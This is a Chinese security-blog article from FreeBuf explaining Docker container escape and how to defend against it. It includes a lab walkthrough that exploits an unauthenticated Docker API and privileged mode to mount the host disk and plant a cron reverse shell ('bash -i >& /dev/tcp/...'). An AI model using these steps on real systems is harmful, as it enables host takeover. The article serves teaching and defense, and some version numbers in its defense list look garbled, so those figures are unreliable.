freeBuf
主站

分类

云安全 AI安全 开发安全 终端安全 数据安全 Web安全 基础安全 企业安全 关基安全 移动安全 系统安全 其他安全

特色

热点 工具 漏洞 人物志 活动 安全招聘 攻防演练 政策法规

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

Docker逃逸原理
2020-07-31 12:37:51

Docker是时下使用范围最广的开源容器技术之一,具有高效易用等优点。由于设计的原因,Docker天生就带有强大的安全性,甚至比虚拟机都要更安全,但你可曾想过“坚不可摧”的Docker也会被人攻破,Docker逃逸所造成的影响之大几乎席卷了全球的Docker容器。

本期美创安全实验室将会带大家研究造成Docker逃逸的根本原理以及相应的防御方法。 docker

Docker简介

Docker是一种容器,容器的官方定义是:将软件打包成标准化单元、以用于开发、交付和部署。容器的特点在于格式统一,运行速度快,所需资源小,并且可以层层重叠。

与虚拟机的架构进行一下对比就可以看出,Docker整体的架构更加轻巧,灵活。而且由于Docker是直接利用宿主机的系统内核,所以可以做到几秒钟之内创建大量的容器,他们的启动速度是在数量级上的差距。虚拟机与Docker的架构对比图:左为虚拟机架构、右为Docker架构

虚拟机与Docker的架构对比图:左为虚拟机架构、右为Docker架构

Docker逃逸原理

因为Docker所使用的是隔离技术,就导致了容器内的进程无法看到外面的进程,但外面的进程可以看到里面,所以如果一个容器可以访问到外面的资源,甚至是获得了宿主主机的权限,这就叫做“Docker逃逸”。

目前产生Docker逃逸的原因总共有三种:

  1. 由内核漏洞引起。
  2. 由Docker软件设计引起。
  3. 由特权模式与配置不当引起。

接下来依次对这三种逃逸方法做简单说明。

01由于内核漏洞引起的逃逸

因为Docker是直接共享的宿主主机内核,所以当宿主主机的内核存在安全漏洞时会一并影响Docker的安全,导致可能会造成Docker逃逸。具体流程如下:

 ①使用内核漏洞进入内核上下文

 ②获取当前进程的task struct

 ③回溯task list 获取pid = 1的task struct,复制其相关数据

 ④切换当前namespace

 ⑤打开root shell,完成逃逸

02由于Doker软件设计引起的逃逸

比较典型的例子是Docker的标准化容器执行引擎----runc。Runc曾在2019年2月被爆出来过一个Docker逃逸漏洞CVE-2019-5736。其漏洞原理是,Docker、Containerd或其他基于runc的容易在运行时存在安全漏洞,攻击者可以通过特定的容器镜像或者exec操作获取到宿主机runc执行文件时的文件句柄并修改掉runc的二进制文件,从而获取到宿主机的root执行权限,造成Docker逃逸。

03由于特权模式+目录挂载引起的逃逸

这一种逃逸方法较其他两种来说用的更多。特权模式在6.0版本的时候被引入Docker,其核心作用是允许容器内的root拥有外部物理机的root权限,而此前在容器内的root用户只有外部物理机普通用户的权限。

使用特权模式启动容器后(docker run --privileged),Docker容器被允许可以访问主机上的所有设备、可以获取大量设备文件的访问权限、并可以执行mount命令进行挂载。

当控制使用特权模式的容器时,Docker管理员可通过mount命令将外部宿主机磁盘设备挂载进容器内部,获取对整个宿主机的文件读写权限,此外还可以通过写入计划任务等方式在宿主机执行命令。

除了使用特权模式启动Docker会引起Docker逃逸外,使用功能机制也会造成Docker逃逸。Linux内核自版本2.2引入了功能机制(Capabilities),打破了UNIX/LINUX操作系统中超级用户与普通用户的概念,允许普通用户执行超级用户权限方能运行的命令。例如当容器以--cap-add=SYSADMIN启动,Container进程就被允许执行mount、umount等一系列系统管理命令,如果攻击者此时再将外部设备目录挂载在容器中就会发生Docker逃逸。

Docker逃逸实验(特权模式+目录挂载)

目标机:192.168.210.37 

目标机上对外开启了Docker服务,运行在2375端口上。直接访问目标机的2375端口即可未授权查看Docker信息,如下:

可未授权查看Docker信息 查看当前docker中存在的所有容器:docker images 

使用特权模式启动容器特权模式启动容器

查看磁盘文件:fdisk -l

查看磁盘文件:fdisk -l  从返回结果来看sda1、sda2、sda3在/dev目录下。 

新建一个目录/test,然后将/dev/sda1挂载到新建的目录下

mkdir /test

mount /dev/sda1 /test

 

这时再查看新建的目录/test,就可以访问宿主机上的目录内容了(/root目录下的内容) 

同理,新建一个目录/test2,将/dev/sda3挂载到新建的目录下,并查看test2目录下的内容,发现可以访问宿主机上/目录下的内容了

 在计划任务里写入一个反弹shell:

echo '* * * * * bash -i >& /dev/tcp/x.x.x.x/7777 0>&1'>> /test2/var/spool/cron/root

在Docker上开启netcat监听7777端口,成功接收到宿主主机的Shell,实现Docker逃逸。

 Docker逃逸防御

  • 更新Docker版本到03.1及更高版本——CVE-2019-14271、覆盖CVE-2019-5736。
  • runc版本 >1.0-rc6
  • k8s 集群版本>1.12
  • Linux内核版本>=2.6.22——CVE-2016-5195(脏牛)
  • Linux内核版本>=4.14——CVE-2017–1000405(大脏牛),未找到docker逃逸利用过程,但存在逃逸风险。
  • 不建议以root权限运行Docker服务。
  • 不建议以privileged(特权模式)启动Docker。
  • 不建议将宿主机目录挂载至容器目录。
  • 不建议将容器以—cap-add=SYSADMIN启动,SYSADMIN意为container进程允许执行mount、umount等一系列系统管理操作,存在容器逃逸风险。
# Docker # docker安全 # docker安全规范 # 美创科技
本文为 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者
文章目录